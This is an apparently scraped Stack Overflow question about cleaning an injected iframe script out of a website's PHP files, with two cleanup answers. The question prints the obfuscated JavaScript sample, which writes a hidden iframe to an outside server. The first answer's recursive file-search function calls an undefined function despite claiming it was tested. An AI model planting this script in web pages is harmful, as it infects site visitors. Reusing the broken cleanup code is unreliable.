How can i remove an iframe virus from all of php files on my website

倖福魔咒の 提交于 2019-12-12 03:24:46

问题


I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output

here the virus code :

<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|125||src|height|230|width|board||248|php|58|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>

Above code in every single php file. How can i remove this virus code from every php file ? Is there a quick way for doing it?


回答1:


You can use:

removeVirus.php

<?php

foreach(rglob("*.php") as $virusFile){

    $withVirus = file_get_contents($virusFile);
    $withoutVirus = preg_replace('%<tag\d+>.*</tag\d+>%', '', $withVirus);
    file_put_contents($virusFile, $withoutVirus);
}

function rglob($pattern, $flags = 0){
// forked from https://github.com/rodurma/PHP-Functions/
    // blob/master/glob_recursive.php
  $files = glob($pattern, $flags);

  foreach (glob(dirname($pattern).'/*', 
    GLOB_ONLYDIR|GLOB_NOSORT) as $dir){
    $files = array_merge($files, glob_recursive
        ($dir.'/'.basename($pattern), $flags));
  }
  return $files;
}

Usage:

put removeVirus.php on the root of your website and execute from the shell as root (or as the owner of the files)

php removeVirus.php

Notes:

1 - I've tested the code on my server with 10 php files containing the virus and it worked as intended.

2 - Make sure you find the source of the hack and patch your system accordingly.




回答2:


If the "virus code" string literal you have provided is embedded in every php file, then it can be removed via command line. Open the shell application (Command Prompt for Windows or Terminal for UNIX/UNIX-based operating systems e.g. OS X, Linux, etc). You will need to escape the virus code before you pass it to the shell, however the ideal methods may vary dependent on your system. Execute the following commands:

cd /path/to/your/infected/php/files

sed -i 's/insert_escaped_virus_code_here//g' *

P.S. If see has not yet been installed, then follow these directions for OS X and Windows.



来源:https://stackoverflow.com/questions/33049787/how-can-i-remove-an-iframe-virus-from-all-of-php-files-on-my-website

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!